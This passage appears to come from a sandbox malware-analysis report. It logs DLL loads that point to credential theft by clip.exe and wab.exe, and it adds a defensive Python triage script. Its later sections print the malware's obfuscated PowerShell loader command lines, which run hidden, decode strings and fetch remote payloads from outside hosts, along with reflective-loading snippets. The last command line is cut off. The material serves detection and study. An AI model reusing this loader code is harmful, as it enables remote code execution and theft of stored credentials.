               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: version.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: wininet.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: ieframe.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: iertutil.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: netapi32.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: winhttp.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: wkscli.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: netutils.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: secur32.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: mlang.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: propsys.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: winsqlite3.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: vaultcli.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: wintypes.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: dpapi.dll
               Source: C:\Windows\SysWOW64\clip.exe Section loaded: cryptbase.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: wininet.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: mswsock.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: dnsapi.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: iphlpapi.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: fwpuclnt.dll
               Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe Section loaded: rasadhlp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
               Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
               Source: Window Recorder Window detected: More than 3 window changes detected
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Binary string: lambda_methodCore.pdb5 source: powershell.exe, 00000006.00000002.2507983794.0000000008320000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2966794524.00000000088BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2508311915.000000000837F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l@ source: powershell.exe, 00000006.00000002.2505588191.0000000007251000.00000004.00000020.00020000.00000000.sdmp
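The module-load and registry lines above carry the credential-theft evidence on their own: clip.exe, a clipboard utility with no business reading secret stores, loads winsqlite3.dll, vaultcli.dll and dpapi.dll alongside wininet.dll/winhttp.dll, and wab.exe opens the Outlook "OMI Account Manager\Accounts" key. The following script is an added example, not part of the Joe Sandbox report, that turns that observation into a repeatable triage pass over lines in the report's own "Source: <image><event>: <value>" format (it tolerates the missing separator between the image path and the event). The credential-DLL list, the registry-path list and the allowlist of processes expected to touch those stores are the author's assumptions and should be tuned per estate; the explorer.exe line in the sample is constructed for contrast, every other sample line is copied from the listing above.

```python
"""Triage sandbox behaviour lines for credential-store access by unexpected processes.

Added example; not part of the Joe Sandbox report. Parses "Section loaded" and
"Key opened" events per process image and flags images that are not expected
credential readers yet load two or more credential-access DLLs or open a known
credential registry path. Network-capable DLLs are recorded as a secondary signal.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample. All lines except the explorer.exe one are copied from the
# behaviour listing above; the report writes image and event with no separator.
SAMPLE_EVENTS = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\explorer.exeSection loaded: vaultcli.dll
"""

# Assumption: DLLs a process needs when it reads stored credentials.
CREDENTIAL_DLLS = {
    "vaultcli.dll": "Windows Credential Manager vault API",
    "winsqlite3.dll": "SQLite, used to read browser login and cookie databases",
    "dpapi.dll": "DPAPI unprotect of stored secrets",
}
# Assumption: DLLs that give the process an HTTP client for exfiltration.
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "urlmon.dll"}
# Assumption: registry paths (lower-case suffixes) that hold mail-client credentials.
CREDENTIAL_KEYS = (r"\software\microsoft\office\outlook\omi account manager\accounts",)
# Assumption: images that legitimately read these stores; tune per estate.
EXPECTED_READERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}

# Image path ends at the first ".exe"; whitespace between image and event is optional.
EVENT_RE = re.compile(
    r"Source:\s*(?P<image>[^\n]*?\.exe)\s*(?P<event>Section loaded|Key opened):\s*(?P<value>[^\n]+)"
)


def parse_events(text: str) -> Dict[str, Dict[str, Set[str]]]:
    """Group loaded DLLs and opened keys by process image (values lower-cased)."""
    procs: Dict[str, Dict[str, Set[str]]] = defaultdict(lambda: {"dlls": set(), "keys": set()})
    for m in EVENT_RE.finditer(text):
        bucket = "dlls" if m["event"].lower() == "section loaded" else "keys"
        procs[m["image"]][bucket].add(m["value"].strip().lower())
    return procs


def triage(text: str) -> List[dict]:
    """Return one finding per unexpected image that shows credential-store access."""
    findings = []
    for image, ev in sorted(parse_events(text).items()):
        if image.rsplit("\\", 1)[-1].lower() in EXPECTED_READERS:
            continue
        cred_dlls = sorted(d for d in ev["dlls"] if d in CREDENTIAL_DLLS)
        cred_keys = sorted(k for k in ev["keys"] if any(k.endswith(p) for p in CREDENTIAL_KEYS))
        if len(cred_dlls) >= 2 or cred_keys:
            findings.append({
                "image": image,
                "credential_dlls": cred_dlls,
                "credential_keys": cred_keys,
                "network_capable": bool(ev["dlls"] & NETWORK_DLLS),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["image"])
        for d in f["credential_dlls"]:
            print(f"  loads {d}: {CREDENTIAL_DLLS[d]}")
        for k in f["credential_keys"]:
            print(f"  opens {k}")
        print(f"  network capable: {f['network_capable']}")
```

Run against the sample, clip.exe is flagged on the DLL rule and wab.exe on the registry rule; the powershell.exe instance is not flagged because amsi.dll is not a credential signal, and explorer.exe is skipped by the allowlist. The two-DLL threshold keeps a lone dpapi.dll load (common in TLS and profile code, as wab.exe shows) from firing on its own.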

              Data Obfuscation

               Source: Yara match File source: 0000001B.00000002.3098293676.0000000003B17000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000006.00000002.2511671395.000000000A87F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000018.00000002.2970941150.000000000A1F7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 0000000B.00000002.3408936789.000000000486F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000018.00000002.2970578601.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000018.00000002.2944964095.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000014.00000002.3371615882.0000000005BA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match File source: 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Jede)$global:irrestrainably = [System.Text.Encoding]::ASCII.GetString($eternitfabrikken)$global:Arbejdsgiverforenings=$irrestrainably.substring($Exaltee,$Umyndiges)<#Nonsilicious Odo
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((stikpropperne $Tollbooths $Lactosid), (Boligudvalg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Zoroastra = [AppDomain]::CurrentDomain.GetAssemblies()$g
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Whorled)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Istandsatte, $false).DefineType($Nonproliferous,
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Jede)$global:irrestrainably = [System.Text.Encoding]::ASCII.GetString($eternitfabrikken)$global:Arbejdsgiverforenings=$irrestrainably.substring($Exaltee,$Umyndiges)<#Nonsilicious Odo
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gteskabsbruddenes $lesses $Altereres), (Anspndende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outstations = [AppDomain]::CurrentDomain.GetAssemblies()
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Restraighten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Constantin, $false).DefineType($blindcat, $S
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Behandlingsform)$global:Buldret = [System.Text.Encoding]::ASCII.GetString($Embosom)$global:Brevicauda2=$Buldret.substring($Sycophant,$Fanhouse)<#Andestegs Ulykkers Ejende Blafren Tas
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
